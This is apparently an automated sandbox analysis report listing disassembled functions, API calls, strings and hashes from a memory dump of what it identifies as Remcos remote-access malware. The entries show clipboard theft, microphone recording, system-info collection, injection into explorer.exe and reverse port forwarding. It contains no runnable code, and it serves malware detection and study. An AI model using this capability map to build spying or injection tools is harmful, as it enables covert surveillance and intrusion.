                  • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                  • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                  Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                  • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                  • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                  • String ID: 0VG$0VG$<$@$Temp
                  • API String ID: 1704390241-2575729100
                  • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                  • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                  • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                  • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                  Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                  Download Yara Rule
                  APIs
                  • OpenClipboard.USER32 ref: 00416941
                  • EmptyClipboard.USER32 ref: 0041694F
                  • CloseClipboard.USER32 ref: 00416955
                  • OpenClipboard.USER32 ref: 0041695C
                  • GetClipboardData.USER32 ref: 0041696C
                  • GlobalLock.KERNEL32 ref: 00416975
                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                  • CloseClipboard.USER32 ref: 00416984
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                  • String ID: !D@
                  • API String ID: 2172192267-604454484
                  • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                  • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                  • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                  • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                  Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                  • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                  • CloseHandle.KERNEL32(00000000), ref: 0041345F
                  • CloseHandle.KERNEL32(?), ref: 00413465
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                  • String ID:
                  • API String ID: 297527592-0
                  • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                  • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                  • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                  • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                  Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                  • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                  • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                  • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                  Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00448135
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00448141
                  • _free.LIBCMT ref: 0044814C
                  • _free.LIBCMT ref: 00448157
                  • _free.LIBCMT ref: 00448162
                  • _free.LIBCMT ref: 0044816D
                  • _free.LIBCMT ref: 00448178
                  • _free.LIBCMT ref: 00448183
                  • _free.LIBCMT ref: 0044818E
                  • _free.LIBCMT ref: 0044819C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                  • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                  • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                  • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                  Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Eventinet_ntoa
                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                  • API String ID: 3578746661-3604713145
                  • Opcode ID: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                  • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                  • Opcode Fuzzy Hash: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                  • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                  Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DecodePointer
                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                  • API String ID: 3527080286-3064271455
                  • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                  • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                  • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                  • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                  Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetConsoleCP.KERNEL32 ref: 0044B3FE
                  • __fassign.LIBCMT ref: 0044B479
                  • __fassign.LIBCMT ref: 0044B494
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                  • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID: PkGNG
                  • API String ID: 1324828854-263838557
                  • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                  • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                  • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                  • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                  Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                  Download Yara Rule
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • Sleep.KERNEL32(00000064), ref: 00417521
                  • DeleteFileW.KERNEL32(00000000), ref: 00417555
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CreateDeleteExecuteShellSleep
                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                  • API String ID: 1462127192-2001430897
                  • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                  • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                  • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                  • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                  Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040749E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcess
                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                  • API String ID: 2050909247-4242073005
                  • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                  • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                  • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                  • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                  Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  • _strftime.LIBCMT ref: 00401D50
                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                  • API String ID: 3809562944-243156785
                  • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                  • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                  • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                  • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                  Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                  Download Yara Rule
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                  • int.LIBCPMT ref: 00410E81
                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                  • std::_Facet_Register.LIBCPMT ref: 00410EC1
                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                  • __Init_thread_footer.LIBCMT ref: 00410F29
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                  • String ID: ,kG$0kG
                  • API String ID: 3815856325-2015055088
                  • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                  • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                  • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                  • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                  Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                  Download Yara Rule
                  APIs
                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                  • waveInStart.WINMM ref: 00401CFE
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                  • String ID: dMG$|MG$PG
                  • API String ID: 1356121797-532278878
                  • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                  • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                  • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                  • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                  Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                    • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                    • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                    • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                  • TranslateMessage.USER32(?), ref: 0041D4E9
                  • DispatchMessageA.USER32 ref: 0041D4F3
                  • GetMessageA.USER32 ref: 0041D500
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                  • String ID: Remcos
                  • API String ID: 1970332568-165870891
                  • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                  • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                  • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                  • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                  Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                  • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                  • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                  • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                  Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • _memcmp.LIBVCRUNTIME ref: 00445423
                  • _free.LIBCMT ref: 00445494
                  • _free.LIBCMT ref: 004454AD
                  • _free.LIBCMT ref: 004454DF
                  • _free.LIBCMT ref: 004454E8
                  • _free.LIBCMT ref: 004454F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorLast$_abort_memcmp
                  • String ID: C
                  • API String ID: 1679612858-1037565863
                  • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                  • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                  • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                  • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                  Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: tcp$udp
                  • API String ID: 0-3725065008
                  • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                  • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                  • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                  • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                  Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                  • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                  • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                    • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                  • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                  • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                  • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                    • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                    • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                  • String ID: t^F
                  • API String ID: 3950776272-389975521
                  • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                  • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                  • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                  • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                  Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 004018BE
                  • ExitThread.KERNEL32 ref: 004018F6
                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                  • String ID: PkG$XMG$NG$NG
                  • API String ID: 1649129571-3151166067
                  • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                  • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                  • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                  • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                  Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                  • MoveFileW.KERNEL32 ref: 00407A6A
                  • CloseHandle.KERNEL32(00000000), ref: 00407A95
                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                  • String ID: .part
                  • API String ID: 1303771098-3499674018
                  • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                  • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                  • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                  • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                  Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                  • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
